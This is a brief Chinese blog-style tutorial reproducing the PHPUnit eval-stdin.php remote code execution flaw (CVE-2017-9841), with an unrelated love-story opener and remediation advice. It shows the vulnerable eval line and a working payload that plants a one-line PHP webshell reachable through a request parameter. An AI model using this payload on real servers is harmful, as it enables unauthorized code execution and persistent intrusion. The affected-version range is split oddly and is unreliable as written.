phpunit远程代码执⾏漏洞(CVE-2017-9841)复现
phpunit 远程代码执⾏漏洞(CVE-2017-9841)复现
上海虹桥机场有这么⼀个故事,⼀对恋⼈在机场分⼿,⼥对男说“你别等我了,我们不会有结果,就像机场永远等不来⽕车,我们以后也不会有交集”。没过⼏年,虹桥机场跟⽕车站连在了⼀起,设计这个⼯程的总⼯程师就是那个男的,只要有爱就有办法,任何⼈都可以⽆⽌境的对⼀个⼈好,但是前提是值得。
漏洞概述:
PHPUnit 是 PHP 程式语⾔中最常见的单元测试 (unit testing) 框架,通常phpunit使⽤composer⾮常流⾏的PHP依赖管理器进⾏部署,将会在当前⽬录创建⼀个vendor⽂件夹.phpunit⽣产环境中仍然安装了它,如果该编写器模块存在于Web可访问⽬录,则存在远程代码执⾏漏洞。
漏洞版本:
4.8.19 ~ 4.8.27
5.0.10 ~ 5.
6.2
基本原理:
漏洞位于/phpunit/src/Util/PHP/eval-stdin.php。
eval('?>'.file_get_contents('php://input'));
漏洞复现:
php如何运行代码总体来说就是向vendor/phpunit/src/Util/PHP/eval-stdin.php发送POST请求执⾏php代码。
例如直接执⾏phpinfo
也可以直接写⼊⼀句话⽊马。<?=file_put_contents("1.php", '<?=eval($_REQUEST[1]);?>');
成功⽣成,即可菜⼑连接。
漏洞修复:
果断⼀点,⽣产环境中直接删掉phpunit,没有⽤。如果不想删,念旧情,直接升级吧,
懒打升级?那就直接设置权限,禁⽌访问该⽬录。余⽣很长,请多指教。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。